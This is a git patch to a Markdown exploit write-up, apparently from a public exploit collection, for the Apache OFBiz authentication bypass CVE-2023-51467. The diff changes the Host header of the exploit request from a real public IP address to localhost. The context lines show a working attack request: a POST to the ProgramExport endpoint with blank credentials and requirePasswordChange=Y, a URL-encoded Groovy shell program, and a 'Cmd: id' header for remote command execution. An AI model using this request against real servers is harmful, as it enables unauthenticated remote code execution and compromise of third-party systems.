From 66921aa1f965fdd3de8d2f61bd973d5c0a794a98 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 30 Dec 2023 16:24:12 +0800
Subject: [PATCH] =?UTF-8?q?Update=20Apache=20OFBiz=20=E8=BA=AB=E4=BB=BD?=
 =?UTF-8?q?=E9=AA=8C=E8=AF=81=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E=20(CVE-2?=
 =?UTF-8?q?023-51467).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467).md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467).md b/Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467).md
index 5eb87c9..bd8c02c 100644
--- a/Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467).md	
+++ b/Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467).md	
@@ -38,7 +38,7 @@ groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+ne
 ## exp
 ```
 POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
-Host: 1.214.41.74:28080
+Host: 127.0.0.1:28080
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Cmd: id